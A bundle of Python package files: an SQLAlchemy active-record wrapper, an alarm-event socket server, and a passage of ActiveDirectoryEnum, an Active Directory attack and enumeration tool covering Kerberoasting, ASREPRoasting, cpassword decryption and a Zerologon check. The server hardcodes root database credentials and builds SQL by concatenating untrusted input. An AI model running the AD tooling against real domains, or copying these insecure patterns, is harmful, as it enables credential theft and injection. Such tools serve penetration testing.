class Model(IDMixin, BaseModel):
"""
Model create
"""
created_at = Column(DateTime, default=func.now())
updated_at = Column(DateTime, default=func.now(), onupdate=func.now())
is_deleted = Column(Boolean, default=False, index=True)
deleted_at = Column(DateTime, default=None)
@classmethod
def all(cls, *args, **kwargs):
"""
:returns query:
:**kwargs:
- include_deleted bool: True To filter in deleted records.
By default it is set to False
"""
if not args:
query = cls.query(cls)
else:
query = cls.query(*args)
if "include_deleted" not in kwargs or kwargs["include_deleted"] is False:
query = query.filter(cls.is_deleted != True)
return query
@classmethod
def get(cls, id, include_deleted=False):
"""
Select entry by id
:param id: The id of the entry
:param include_deleted: It should not query deleted record. Set to True to get all
"""
return cls.all(include_deleted=include_deleted)\
.filter(cls.id == id)\
.first()
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - If true it will completely delete the record
"""
# Hard delete
if hard_delete:
try:
self.db.session.delete(self)
return self.db.commit()
except:
self.db.rollback()
raise
else:
data = {
"is_deleted": delete,
"deleted_at": func.now() if delete else None
}
self.update(**data)
return self
class SQLAlchemy(object):
"""This class is used to instantiate a SQLAlchemy connection to
a database.
db = SQLAlchemy(_uri_to_database_)
The class also provides access to all the SQLAlchemy
functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.
So you can declare models like this::
class User(db.Model):
login = db.Column(db.String(80), unique=True)
passw_hash = db.Column(db.String(80))
In a web application you need to call `db.session.remove()`
after each response, and `db.session.rollback()` if an error occurs.
If your application object has a `after_request` and `on_exception
decorators, just pass that object at creation::
app = Flask(__name__)
db = SQLAlchemy('sqlite://', app=app)
or later::
db = SQLAlchemy()
app = Flask(__name__)
db.init_app(app)
.. admonition:: Check types carefully
Don't perform type or `isinstance` checks against `db.Table`, which
emulates `Table` behavior but is not a class. `db.Table` exposes the
`Table` interface, but is a function which allows omission of metadata.
"""
def __init__(self, uri='sqlite://',
app=None,
echo=False,
pool_size=None,
pool_timeout=None,
pool_recycle=None,
convert_unicode=True,
query_cls=BaseQuery):
self.uri = uri
self.info = make_url(uri)
self.options = self._cleanup_options(
echo=echo,
pool_size=pool_size,
pool_timeout=pool_timeout,
pool_recycle=pool_recycle,
convert_unicode=convert_unicode,
)
self.connector = None
self._engine_lock = threading.Lock()
self.session = _create_scoped_session(self, query_cls=query_cls)
self.Model = declarative_base(cls=Model, name='Model')
self.BaseModel = declarative_base(cls=BaseModel, name='BaseModel')
self.Model.db, self.BaseModel.db = self, self
self.Model.query, self.BaseModel.query = self.session.query, self.session.query
if app is not None:
self.init_app(app)
_include_sqlalchemy(self)
def _cleanup_options(self, **kwargs):
options = dict([
(key, val)
for key, val in kwargs.items()
if val is not None
])
return self._apply_driver_hacks(options)
def _apply_driver_hacks(self, options):
if "mysql" in self.info.drivername:
self.info.query.setdefault('charset', 'utf8')
options.setdefault('pool_size', 10)
options.setdefault('pool_recycle', 7200)
elif self.info.drivername == 'sqlite':
no_pool = options.get('pool_size') == 0
memory_based = self.info.database in (None, '', ':memory:')
if memory_based and no_pool:
raise ValueError(
'SQLite in-memory database with an empty queue'
' (pool_size = 0) is not possible due to data loss.'
)
return options
def init_app(self, app):
"""This callback can be used to initialize an application for the
use with this database setup. In a web application or a multithreaded
environment, never use a database without initialize it first,
or connections will leak.
"""
if not hasattr(app, 'databases'):
app.databases = []
if isinstance(app.databases, list):
if self in app.databases:
return
app.databases.append(self)
def shutdown(response=None):
self.session.remove()
return response
def rollback(error=None):
try:
self.session.rollback()
except Exception:
pass
self.set_flask_hooks(app, shutdown, rollback)
def set_flask_hooks(self, app, shutdown, rollback):
if hasattr(app, 'after_request'):
app.after_request(shutdown)
if hasattr(app, 'on_exception'):
app.on_exception(rollback)
@property
def engine(self):
"""Gives access to the engine. """
with self._engine_lock:
connector = self.connector
if connector is None:
connector = EngineConnector(self)
self.connector = connector
return connector.get_engine()
@property
def metadata(self):
"""Proxy for Model.metadata"""
return self.Model.metadata
@property
def query(self):
"""Proxy for session.query"""
return self.session.query
def add(self, *args, **kwargs):
"""Proxy for session.add"""
return self.session.add(*args, **kwargs)
def flush(self, *args, **kwargs):
"""Proxy for session.flush"""
return self.session.flush(*args, **kwargs)
def commit(self):
"""Proxy for session.commit"""
return self.session.commit()
def rollback(self):
"""Proxy for session.rollback"""
return self.session.rollback()
def create_all(self):
"""Creates all tables. """
self.Model.metadata.create_all(bind=self.engine)
self.BaseModel.metadata.create_all(bind=self.engine)
def drop_all(self):
"""Drops all tables. """
self.Model.metadata.drop_all(bind=self.engine)
self.BaseModel.metadata.drop_all(bind=self.engine)
def reflect(self, meta=None):
"""Reflects tables from the database. """
meta = meta or MetaData()
meta.reflect(bind=self.engine)
return meta
def __repr__(self):
return "<SQLAlchemy('{0}')>".format(self.uri) | Active-SQLAlchemy | /Active-SQLAlchemy-0.4.0.tar.gz/Active-SQLAlchemy-0.4.0/active_sqlalchemy.py | active_sqlalchemy.py |
#Active-SQLAlchemy
**Version 0.3.***
---
Active-SQLAlchemy is a framework agnostic wrapper for SQLAlchemy that makes it really easy
to use by implementing a simple active record like api, while it still uses the db.session underneath.
Inspired by Flask-SQLAlchemy.
Works with Python 2.6, 2.7, 3.3, 3.4 and pypy.
---
##Quick Overview:
####Create the model
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy('sqlite://')
class User(db.Model):
name = db.Column(db.String(25))
location = db.Column(db.String(50), default="USA")
last_access = db.Column(db.Datetime)
####Create new record
user = User.create(name="Mardix", location="Moon")
# or
user = User(name="Mardix", location="Moon").save()
####Get all records
all = User.all()
####Get a record by id
user = User.get(1234)
####Update record
user = User.get(1234)
if user:
user.update(location="Neptune")
####Soft Delete a record
user = User.get(1234)
if user:
user.delete()
####Query Records
users = User.all(User.location.distinct())
for user in users:
...
####Query with filter
all = User.all().filter(User.location == "USA")
for user in users:
...
##How to use
### Install
pip install active_sqlalchemy
### Create a connection
The SQLAlchemy class is used to instantiate a SQLAlchemy connection to
a database.
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy(dialect+driver://username:password@host:port/database)
#### Databases Drivers & DB Connection examples
Active-SQLAlchemy comes with a `PyMySQL` and `PG8000` as drivers for MySQL
and PostgreSQL respectively, because they are in pure Python. But you can use
other drivers for better performance. `SQLite` is already built in Python.
**SQLite:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("sqlite://") # in memory
# or
db = SQLAlchemy("sqlite:///foo.db") # DB file
**PostgreSql:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("postgresql+pg8000://user:password@host:port/dbname")
**PyMySQL:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("mysql+pymysql://user:password@host:port/dbname")
---
Active-SQLAlchemy also provides access to all the SQLAlchemy
functions from the ``sqlalchemy`` and ``sqlalchemy.orm`` modules.
So you can declare models like the following examples:
### Create a Model
To start, create a model class and extends it with db.Model
# mymodel.py
from active_sqlachemy import SQLAlchemy
db = SQLAlchemy("sqlite://")
class MyModel(db.Model):
name = db.Column(db.String(25))
is_live = db.Column(db.Boolean, default=False)
# Put at the end of the model module to auto create all models
db.create_all()
- Upon creation of the table, db.Model will add the following columns: ``id``, ``created_at``, ``upated_at``, ``is_deleted``, ``deleted_at``
- It does an automatic table naming (if no table name is already defined using the ``__tablename__`` property)
by using the class name. So, for example, a ``User`` model gets a table named ``user``, ``TodoList`` becomes ``todo_list``
The name will not be plurialized.
---
## Models: *db.Model*
**db.Model** extends your model with helpers that turn your model into an active record like model. But underneath, it still uses the ``db.session``
**db.Model** also adds a few preset columns on the table:
``id``: The primary key
``created_at``: Datetime. It contains the creation date of the record
``updated_at``: Datetime. It is updated whenever the record is updated.
``deleted_at``: Datetime. Contains the datetime the record was soft-deleted.
``is_deleted``: Boolean. A flag to set if record is soft-deleted or not
**-- About Soft Delete --**
By definition, soft-delete marks a record as deleted so it doesn't get queried, but it still exists in the database. To actually delete the record itself, a hard delete must apply.
By default, when a record is deleted, **Active-SQLAlchemy** actually sets ``is_deleted`` to True and excludes it from being queried, and ``deleted_at`` is also set. But this happens only when using the method ``db.Model.delete()``.
When a record is soft-deleted, you can also undelete a record by doing: ``db.Model.delete(False)``
Now, to totally delete off the table, ``db.Model.delete(hard_delete=True)``
**-- Querying with *db.Model.all()* --**
Due to the fact that **Active-SQLAlchemy** has soft-delete, to query a model without the soft-deleted records, you must query your model by using the ``all(*args, **kwargs)`` which returns a db.session.query object for you to apply filter on etc.
**-- db.BaseModel --**
By default ``db.Model`` adds several preset columns on the table, if you don't want to have them in your model, you can use instead ``db.BaseModel``, which still give you access to the methods to query your model.
---
### db.Model Methods Description
**all(\*args, \*\*kwargs)**
Returns a ``db.session.query`` object to filter or apply more conditions.
all = User.all()
for user in all:
print(user.login)
By default all() will show only all non-soft-delete records. To display both deleted and non deleted items, add the arg: ``include_deleted=True``
all = User.all(include_deleted=True)
for user in all:
print(user.login)
Use all to select columns etc
all = User.all(User.name.distinct(), User.location)
for user in all:
print(user.login)
Use all for complete filter
all = User.all(User.name.distinct, User.location).order_by(User.updated_at.desc()).filter(User.location == "Charlotte")
**get(id)**
Get one record by id. By default it will query only a record that is not soft-deleted
id = 1234
user = User.get(id)
print(user.id)
print(user.login)
To query a record that has been soft deleted, just set the argument ``include_deleted=True``
id = 234
user = User.get(id, include_deleted=True)
**create(\*\*kwargs)**
To create/insert new record. Same as __init__, but just a shortcut to it.
record = User.create(login='abc', passw_hash='hash', profile_id=123)
print (record.login) # -> abc
or you can use the __init__ with save()
record = User(login='abc', passw_hash='hash', profile_id=123).save()
print (record.login) # -> abc
or
record = User(login='abc', passw_hash='hash', profile_id=123)
record.save()
print (record.login) # -> abc
**update(\*\*kwargs)**
Update an existing record
record = User.get(124)
record.update(login='new_login')
print (record.login) # -> new_login
**delete()**
To soft delete a record. ``is_deleted`` will be set to True and ``deleted_at`` datetime will be set
record = User.get(124)
record.delete()
print (record.is_deleted) # -> True
To soft UNdelete a record. ``is_deleted`` will be set to False and ``deleted_at`` datetime will be None
record = User.get(124)
record.delete(delete=False)
print (record.is_deleted) # -> False
To HARD delete a record. The record will be deleted completely
record = User.get(124)
record.delete(hard_delete=True)
**save()**
A shortcut to ``session.add`` + ``session.commit()``
record = User.get(124)
record.login = "Another one"
record.save()
---
#### Method Chaining
For convenience, some method chaining are available
user = User(name="Mardix", location="Charlotte").save()
User.get(12345).update(location="Atlanta")
User.get(345).delete().delete(False).update(location="St. Louis")
---
#### Aggegated selects
class Product(db.Model):
name = db.Column(db.String(250))
price = db.Column(db.Numeric)
results = Product.all(db.func.sum(Unit.price).label('price'))
---
## With Web Application
In a web application you need to call ``db.session.remove()`` after each response, and ``db.session.rollback()`` if an error occurs. However, if you are using Flask or other framework that uses the `after_request` and ``on_exception`` decorators, these bindings it is done automatically.
For example using Flask, you can do:
app = Flask(__name__)
db = SQLAlchemy('sqlite://', app=app)
or
db = SQLAlchemy()
app = Flask(__name__)
db.init_app(app)
### More examples
####Many databases, one web app
app = Flask(__name__)
db1 = SQLAlchemy(URI1, app)
db2 = SQLAlchemy(URI2, app)
####Many web apps, one database
db = SQLAlchemy(URI1)
app1 = Flask(__name__)
app2 = Flask(__name__)
db.init_app(app1)
db.init_app(app2)
---
## Pagination
All the results can be easily paginated
users = User.paginate(page=2, per_page=20)
print(list(users)) # [User(21), User(22), User(23), ... , User(40)]
The paginator object it's an iterable that returns only the results for that page, so you use it in your templates in the same way than the original result:
{% for item in paginated_items %}
<li>{{ item.name }}</li>
{% endfor %}
Rendering the pages
Below your results is common that you want it to render the list of pages.
The ``paginator.pages`` property is an iterator that returns the page numbers, but sometimes not all of them: if there are more than 11 pages, the result will be one of these, depending of what is the current page:
Skipped page numbers are represented as ``None``.
How many items are displayed can be controlled calling ``paginator.iter_pages`` instead.
This is one way how you could render such a pagination in your templates:
{% macro render_paginator(paginator, endpoint) %}
<p>Showing {{ paginator.showing }} or {{ paginator.total }}</p>
<ol class="paginator">
{%- if paginator.has_prev %}
<li><a href="{{ url_for(endpoint, page=paginator.prev_num) }}"
rel="me prev">«</a></li>
{% else %}
<li class="disabled"><span>«</span></li>
{%- endif %}
{%- for page in paginator.pages %}
{% if page %}
{% if page != paginator.page %}
<li><a href="{{ url_for(endpoint, page=page) }}"
rel="me">{{ page }}</a></li>
{% else %}
<li class="current"><span>{{ page }}</span></li>
{% endif %}
{% else %}
<li><span class=ellipsis>…</span></li>
{% endif %}
{%- endfor %}
{%- if paginator.has_next %}
<li><a href="{{ url_for(endpoint, page=paginator.next_num) }}"
rel="me next">»</a></li>
{% else %}
<li class="disabled"><span>»</span></li>
{%- endif %}
</ol>
{% endmacro %}
______
####Credits:
[SQLAlchemy](http://www.sqlalchemy.org/)
[Flask-SQLAlchemy](https://pythonhosted.org/Flask-SQLAlchemy)
[SQLAlchemy-Wrapper](https://github.com/lucuma/sqlalchemy-wrapper)
---
copyright: 2015
license: MIT, see LICENSE for more details.
| Active-SQLAlchemy | /Active-SQLAlchemy-0.4.0.tar.gz/Active-SQLAlchemy-0.4.0/README.md | README.md |
import socketserver, time, mysql.connector, zeep
from datetime import datetime
# Configuração do servidor
HostSocket = ''
Porta = 2034
KeepAlive = '05'
Status = 'A' # A para ativo e I para inativo
NumeroSdc = 0
CodigoImei = None
TipoEvento = None
Canal = '224'
# Configuração da coneçao Mysql
BDHost = '5.135.68.92'
BDUser = 'root'
BDPass = 'root'
BDBanco = 'confimonit'
SQLresult = None
# acerta url webservice
cliente = zeep.Client(wsdl = 'http://confmonit.com/webservice/webservice.asmx?WSDL')
#Retorna a hora do sistema
def agora(): return time.ctime(time.time())
def SQL(query):
'''
Cria uma conexão com o banco de dados que vai receber
os eventos vindo dos alarmes, tratando os erros de
usuario, senha e banco
'''
try:
# Cria uma conexão na variavel cnx
cnx = mysql.connector.connect(user = BDUser,
password = BDPass,
host = BDHost,
database = BDBanco)
except mysql.connector.Error as erro:
if erro.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Erro de USUARIO ou SENHA")
elif erro.errno == errorcode.ER_BAD_BD_ERROR:
print("Banco de Dados Inexistente")
else: print(erro)
cursor = cnx.cursor()
cursor.execute(query)
resultado = cursor.fetchone()
if (query[:6] != 'SELECT'):
cnx.commit()
cursor.close()
cnx.close()
return resultado
class Clientes(socketserver.BaseRequestHandler):
try:
def handle(self):
# Para cada conexão de um novo cliente
# implimimos a identificação e o horario da conexão
global CodigoImei, CodigoImei
print(self.client_address, agora())
while True:
# Recebe dados do Cliente
evento = self.request.recv(40)
if not evento: break
# Pega o codigo para verificação se e conexao '!'(33)
# ou se é keep Alive '@'(64) ou evento '$'(36)
cmd = evento[0]
if cmd == 33: # pedido de conexão
EventoCod = evento[1:16]
CodigoImei = EventoCod.decode("utf-8")
SQLresult = SQL("SELECT dispositivos_cliente, dispositivos_ativo, dispositivos_KeepAlive" +
" FROM dispositivos" +
" WHERE dispositivos_imei = " + CodigoImei)
NumeroSdc = SQLresult[0]
Status = SQLresult[1]
KeepAlive = SQLresult[2]
print(NumeroSdc, CodigoImei)
# Evia + para aceitar conexão
if Status == 'A': self.request.send(b'+')
# Evia - para recusar conexão
else: self.request.send(b'-')
if cmd == 64: # pedido Keep Alive
EventoCod = evento[1:14]
ContactID = EventoCod.decode("utf-8")
print(CodigoImei, '->', agora())
SQLresult = SQL("SELECT dispositivos_KeepAlive" +
" FROM dispositivos" +
" WHERE dispositivos_imei = " + CodigoImei)
KeepAlive = SQLresult[0]
if (Contactid[0:4] == ''):
conta = '9999'
else:
conta = Contactid[0:4]
TipoEvento = "M017"
cliente.service.Proc_Evt(str(NumeroSdc), conta,
Canal, datetime.now(), datetime.now(), TipoEvento, ContactID[10:14], '0', 0,
TipoEvento, TipoEvento, False, 0, False, '0', 0, datetime.now(),
'confmonitvirtual')
self.request.send(b'@' + bytes.fromhex(KeepAlive)) # Envia tempo de Keep Alive
if cmd == 36: # Informa evento
EventoCod = evento[1:14]
ContactID = EventoCod.decode("utf-8")
print(ContactID)
# cria a query para inserção no banco
SQLresult = SQL("INSERT INTO recebeeventos (" +
"recebeeventos_sdc, recebeeventos_imei, recebeeventos_contactid)" +
" VALUES (" + str(NumeroSdc) + ", " + CodigoImei + ", " + ContactID + ")")
if (ContactID[4] == '1'): TipoEvento = 'E' + ContactID[5:8]
if (ContactID[4] == '3'): TipoEvento = 'R' + ContactID[5:8]
cliente.service.Proc_Evt(str(NumeroSdc), ContactID[0:4],
Canal, datetime.now(), datetime.now(), TipoEvento,
TipoEvento, TipoEvento, ContactID[10:14], '0', 0,
False, 0, False, '0', 0, datetime.now(),
'confmonitvirtual')
self.request.send(b'@' + bytes.fromhex(KeepAlive)) # Envia tempo de Keep Alive
except:
raise Exception("Perda de conecão")
local = (HostSocket, Porta)
Servidor = socketserver.ThreadingTCPServer(local, Clientes)
Servidor.serve_forever() | ActiveDirect | /ActiveDirect-1.0.zip/ActiveDirect-1.0/ActiveDirect.py | ActiveDirect.py |
[](https://github.com/CasperGN/ActiveDirectoryEnumeration/stargazers) [](https://github.com/CasperGN/ActiveDirectoryEnumeration/network) [](https://github.com/CasperGN/ActiveDirectoryEnumeration/blob/master/LICENSE) [](https://app.fossa.com/projects/git%2Bgithub.com%2FCasperGN%2FActiveDirectoryEnumeration?ref=badge_shield) [](https://lgtm.com/projects/g/CasperGN/ActiveDirectoryEnumeration/alerts/) [](https://lgtm.com/projects/g/CasperGN/ActiveDirectoryEnumeration/context:python)
[](https://repology.org/project/activedirectoryenum/versions)
## ADE - ActiveDirectoryEnum
```
python -m ade
usage: ade [-h] [--dc DC] [-o OUT_FILE] [-u USER] [-s] [-smb] [-kp] [-bh] [-spn] [-sysvol] [--all] [--no-creds] [--dry-run]
[--exploit EXPLOIT]
___ __ _ ____ _ __ ______
/ | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___
/ /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \
/ ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / /
/_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/
/____/
/*----------------------------------------------------------------------------------------------------------*/
optional arguments:
-h, --help show this help message and exit
--dc DC Hostname of the Domain Controller
-o OUT_FILE, --out-file OUT_FILE
Path to output file. If no path, CWD is assumed (default: None)
-u USER, --user USER Username of the domain user to query with. The username has to be domain name as `[email protected]`
-s, --secure Try to estalish connection through LDAPS
-smb, --smb Force enumeration of SMB shares on all computer objects fetched
-kp, --kerberos_preauth
Attempt to gather users that does not require Kerberos preauthentication
-bh, --bloodhound Output data in the format expected by BloodHound
-spn Attempt to get all SPNs and perform Kerberoasting
-sysvol Search sysvol for GPOs with cpassword and decrypt it
--all Run all checks
--no-creds Start without credentials
--dry-run Don't execute a test but run as if. Used for testing params etc.
--exploit EXPLOIT Show path to PoC exploit code
```
The new inclusion of imbedded exploits can yield results such as:
```
...
[ WARN ] DC may be vulnerable to: [ cve-2020-1472 ]
...
```
To query an exploit do for PoC code:
```
$ python -m ade --exploit cve-2020-1472
Exploit for: cve-2020-1472 can be found at: https://github.com/dirkjanm/CVE-2020-1472
```
## Install
Run installation through pip3:
```
pip3 install ActiveDirectoryEnum
python -m ade
```
If you run BlackArch, ActiveDirectoryEnum is available through `pacman` as such:
```
pacman -S activedirectoryenum
```
## Included attacks/vectors
- [X] ASREPRoasting
- [X] Kerberoasting
- [X] Dump AD as BloodHound JSON files
- [X] Searching GPOs in SYSVOL for cpassword and decrypting
- [X] Run without creds and attempt to gather for further enumeration during the run
- [X] Sample exploits included:
- CVE-2020-1472
## Collaboration
While this project is developed to fit my need, any collaboration is appriciated. Please feel free to fork the project, make changes according to the License agreements and make a Pull Request.
I only ask that:
- Keep equivilent naming standard as the base project
- Keep equivilent syntaxing
- Test your code
- Error handling is incorporated
- Document the feature - both in code but also for potential Wiki page
## Thanks & Acknowledgements
Big thanks to the creators of:
`Impacket` [@github](https://github.com/SecureAuthCorp/impacket)
`BloodHound` [@github](https://github.com/BloodHoundAD/BloodHound)
`BloodHound.py` [@github](https://github.com/fox-it/BloodHound.py)
`CVE-2020-1472` by Tom Tervoort of [Secura](https://github.com/SecuraBV/CVE-2020-1472)
Without the above this wrapper was not possible.
## License
[](https://app.fossa.com/projects/git%2Bgithub.com%2FCasperGN%2FActiveDirectoryEnumeration?ref=badge_large) | ActiveDirectoryEnum | /ActiveDirectoryEnum-0.5.0.tar.gz/ActiveDirectoryEnum-0.5.0/README.md | README.md |
from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES
from progressbar import Bar, Percentage, ProgressBar, ETA
from ldap3.core.exceptions import LDAPKeyError
from impacket.smbconnection import SessionError
from impacket.nmb import NetBIOSTimeout, NetBIOSError
from getpass import getpass
from termcolor import colored
from impacket import smbconnection
from impacket.dcerpc.v5 import srvs
import contextlib, argparse, sys, socket, json, re, os, base64
from Cryptodome.Cipher import AES
from dns.resolver import NXDOMAIN
import textwrap
# Thanks SecureAuthCorp for GetNPUsers.py
# For Kerberos preauthentication
from impacket.krb5 import constants
from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter
from impacket.krb5.kerberosv5 import sendReceive, KerberosError
from impacket.krb5.types import KerberosTime, Principal
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.univ import noValue
from binascii import hexlify
import datetime, random
# Thanks SecureAuthCorp for GetUserSPNs.py
# For SPN enum
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.ntlm import compute_lmhash, compute_nthash
from impacket.krb5.asn1 import TGS_REP
from bloodhound import BloodHound, resolve_collection_methods
from bloodhound.ad.domain import AD
from bloodhound.ad.authentication import ADAuthentication
class EnumAD():
def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, domuser=None):
self.server = domainController
self.domuser = domuser
self.ldaps = ldaps
self.output = output
self.bhout = bhout
self.kpre = kpre
self.spnEnum = spnEnum
self.enumsmb = enumsmb
self.searchSysvol = searchSysvol
self.ou_structure = domainController.split('.')
self.dc_string=''
for element in self.ou_structure:
self.dc_string += 'dc={},'.format(element)
# LDAP properties
# At the moment we just want everything
self.ldapProps = ["*"]
# Setting lists containing elements we want from the domain controller
self.computers = []
self.people = []
self.groups = []
self.spn = []
self.acl = []
self.gpo = []
self.domains = []
self.ous = []
self.deletedUsers = []
self.passwd = False
# TODO: Figure a good way to go through the code dryrun
if dryrun:
print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string)
return
if domuser is not False:
self.runWithCreds()
self.enumDeleted()
else:
self.runWithoutCreds()
self.enumDeleted()
self.testExploits()
if not self.CREDS:
print('[ ' + colored('WARN', 'yellow') +' ] Didn\'t find useable info as anonymous user, please gather credentials and run again')
def runWithCreds(self):
self.CREDS = True
if not self.passwd:
self.passwd = str(getpass())
self.bind()
self.search()
if self.output:
self.write_file()
self.checkForPW()
self.checkOS()
if self.searchSysvol:
self.checkSYSVOL()
if self.bhout:
self.outputToBloodhoundJson()
if self.kpre:
self.enumKerbPre()
if self.spnEnum:
self.enumSPNUsers()
self.conn.unbind()
if self.enumsmb:
# Setting variables for further testing and analysis
self.smbShareCandidates = []
self.smbBrowseable = {}
self.sortComputers()
self.enumSMB()
# Lets clear variable now
self.passwd = None
def runWithoutCreds(self):
self.CREDS = False
print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials')
self.passwd = ''
self.domuser = ''
print('')
self.bind()
self.search()
if self.output:
self.write_file()
self.checkForPW()
self.checkOS()
self.enumForCreds(self.people)
return
@contextlib.contextmanager
def suppressOutput(self):
with open(os.devnull, 'w') as devnull:
with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out:
yield (err, out)
def enumDeleted(self):
if len(self.deletedUsers) > 0:
print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users')
self.enumForCreds(self.deletedUsers)
def testExploits(self):
from .exploits import exploits
print('[ ' + colored('OK', 'green') +' ] Attempting to run imbedded exploits...')
exp = exploits.Exploits(self.server, self.computers[0]["name"])
if len(exp.vulnerable) > 0:
cves = ""
for exploit in exp.vulnerable:
cves += f"{exploit}, "
print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]')
else:
print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits')
def bind(self):
try:
if self.ldaps:
self.dc_conn = Server(self.server, port=636, use_ssl=True, get_info='ALL')
self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd)
self.conn.bind()
self.conn.start_tls()
# Validate the login (bind) request
if int(self.conn.result['result']) != 0:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.conn.result['description']))
sys.exit(1)
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server))
else:
self.dc_conn = Server(self.server, get_info=ALL)
self.conn = Connection(self.dc_conn, user=self.domuser, password=self.passwd)
self.conn.bind()
# Validate the login (bind) request
if int(self.conn.result['result']) != 0:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.conn.result['description']))
sys.exit(1)
else:
print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server))
# TODO: Catch individual exceptions instead
except Exception:
if self.ldaps:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server))
else:
print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server))
sys.exit(1)
def search(self):
# Get computer objects
self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.computers.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Computer objects')
# Get person objects
self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.people.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Person objects')
# Get group objects
self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.groups.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Group objects')
# Get SPN objects
self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.spn.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all SPN objects')
# Get ACL objects
self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.acl.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all ACL objects')
# Get GPO objects
self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.gpo.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all GPO objects')
# Get Domain
self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.domains.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all Domains')
# Get OUs
self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE)
for entry in self.conn.entries:
self.ous.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all OUs')
# Get deleted users
self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)])
for entry in self.conn.entries:
self.deletedUsers.append(entry)
print('[ ' + colored('OK', 'green') +' ] Got all deleted users')
'''
Since it sometimes is real that the property 'userPassword:' is set
we test for it and dump the passwords
'''
def checkForPW(self):
passwords = {}
idx = 0
for _ in self.people:
user = json.loads(self.people[idx].entry_to_json())
idx += 1
if user['attributes'].get('userPassword') is not None:
passwords[user['attributes']['name'][0]] = user['attributes'].get('userPassword')
if len(passwords.keys()) > 0:
with open('{0}-clearpw'.format(self.server), 'w') as f:
json.dump(passwords, f, sort_keys=False)
if len(passwords.keys()) == 1:
print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(passwords.keys())))
elif len(passwords.keys()) == 0:
print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(passwords.keys())))
else:
print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(passwords.keys())))
'''
While it is not unusual to find EOL servers hidden or forgotten these
often makes easier targets for lateral movemen, and because of that
